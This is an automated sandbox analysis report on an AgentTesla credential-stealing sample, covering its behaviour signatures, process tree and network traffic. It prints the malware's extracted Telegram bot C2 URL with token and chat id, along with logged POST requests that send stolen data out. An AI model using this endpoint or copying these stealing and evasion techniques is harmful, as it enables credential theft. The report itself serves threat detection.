Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:830902
MD5:2ddec3a033a6ded2ec135bb2f3ec897d
SHA1:cb40f86b808c7b7812fff7820dc596d3a78e5760
SHA256:bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
Tags:NETexeMSIL
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5124 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 3508 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • file.exe (PID: 6116 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4840 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Qasvjoldkyh.exe (PID: 388 cmdline: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 964 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 5604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kDPmkTm.exe (PID: 1496 cmdline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4608 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 3584 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        Process Memory Space: file.exe PID: 6116JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: file.exe PID: 6116JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.5710000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.3.file.exe.41b5d50.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.4149.154.167.220497024432851779 03/20/23-19:39:50.282462
                SID:2851779
                Source Port:49702
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4149.154.167.220496984432851779 03/20/23-19:38:26.620974
                SID:2851779
                Source Port:49698
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 35%
                Source: file.exeVirustotal: Detection: 44%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeReversingLabs: Detection: 35%
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeVirustotal: Detection: 44%Perma Link
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeReversingLabs: Detection: 35%
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeJoe Sandbox ML: detected
                Source: 15.2.Qasvjoldkyh.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
                Source: file.exe.6116.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                May check the online IP address of the machine
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\file.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.file.exe.5710000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.41b5d50.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api4.ipify.org
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
